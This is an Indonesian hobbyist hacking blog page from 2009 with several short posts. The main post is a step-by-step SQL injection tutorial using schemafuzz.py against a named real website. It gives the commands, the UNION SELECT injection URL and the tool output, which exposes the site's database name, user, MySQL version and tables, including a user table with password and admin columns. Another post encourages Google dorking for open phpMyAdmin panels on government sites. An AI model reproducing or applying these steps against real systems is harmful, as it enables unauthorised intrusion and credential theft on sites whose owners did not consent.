Statistics

Blog

Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Sep 9, 2009

Sebuah Trik Hacking Lewat Google

0 comments

Sebuah Trik Hacking Lewat Google

Lagi chat sama Kilurah, tiba-tiba beliau ngasih tau kebocoran di salah satu situs media televisi yang baru jadi. Hmm...kelemahan terletak di aplikasi pengatur database berbasis web yang sudah sangat terkenal, phpMyAdmin. Lalu kesalahannya dimana, apakah termasuk 0day exploit?
Tenang, tenang kesalahan bukan pada aplikasi Anda, tetapi pada Anda sendiri ! (mungkin itu yang akan saya katakan kalo ketemu si admin, huehehehehe).

Kesalahan terbesar yang dilakukan seorang admin ketika menbangun suatu system adalah kesalahan yang sangat tidak diduga dan sangat sepele, misalkan membiarkan semua aplikasi tersetting default (saya menyebutnya konfigurasi pasrah :D). Tentunya hal ini akan berakibat fatal apabila, misalkan suatu ruang yang dikhususkan untuk administrasi dan segala keperluan manajemen website, bisa dimasuki orang lain tanpa autentikasi, ckk..ck..ck..ckk...

Dan memang, hal itulah yang ditemukan Kilurah, sebuah ruang yang dikhususkan untuk mengatur database untuk keperluan web, forum, dan aplikasi lain, dibiarkan terbuka untuk umum. Lalu, bagaimana cara kita bisa menemukan halaman yang notabene agak sulit untuk ditemukan, karena memang ada beberapa kemungkinan direktori-direktori semacam itu(direktori yang menyimpan informasi sensitif) diganti namanya? Tentu saja menggunakan search engine, dan search engine yang tidak pernah men-sensor hasil pencariannya cuma satu, Google :)

Ok, sekarang pertanyaan berikutnya. Apa yang perlu saya ketik di kolom Search milik Google?
Pertanyaan bagus, dan saya punya jawaban yang sangat bagus untuk Anda. Silakan Anda baca-baca tutorial tentang Google Hacking, Hacking dengan Google, atau kalimat-kalimat yang mengandung kata-kata tersebut, dan memulainya dengan mencari di search engine adalah langkah yang sangat tepat. Saya tidak akan memberikan query untuk mencari kelemahan-kelemahan website dengan Google disini, tapi saya hanya memberikan wacana, bahwa hacking menggunakan Google sangatlah MUNGKIN :D

Dan saya beritahu clue selanjutnya, bahwa korban dari Google Hacking ini sangatlah banyak, termasuk di Indonesia.

Setelah diberitahu Kilurah, saya melakukan penelitian lagi dengan memasukkan query-query yang mendukung pencarian dan hasilnya sangat mengejutkan. Beberapa situs pemerintah kita ternyata banyak yang mengandung kelemahan ini yang artinya pembangun website tidak aware dengan keamanan situs yang mereka bangun (situs pemerintah biasanya merupakan sasaran empuk bukan ?! :D)

Baiklah, sekian dulu tulisan saya hari ini, udah ngantuk juga..
Read more

Sep 5, 2009

cara ngehack web

0 comments

Menggunakan schemafuzz.py

1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...


1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
[-] Done!



Berarti kita gunain
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
untuk inject

3.Cari database dg command --dbs
Misal : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--dbs
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


keliatan kan nama databasenya ??? t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D t15618_plb
Maka keluar:

[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done
Read more

Aug 28, 2009

Hacking Mrawut

0 comments
Aku dah nyoba hacking yang mrawut, yaitu hacking pake google. Wah pancen waneh kae seng gawe. Mosok sitik2 "kreatif-kreatif!!!". wah Payah. Aku nganti rak mudeng babar blas. Eh jebue malah q iso. yowes tho!!!!!!!!! hahahahaaaaaaaa..........
Read more

Aug 21, 2009

Hacking Facebook

0 comments
Hacking Facebook

Sebenarnya, bisakah hacking facebook???
Jawabannya adalah...
ternyata bisa!!!!!!!!!!!
Read more

Design by fr00ty company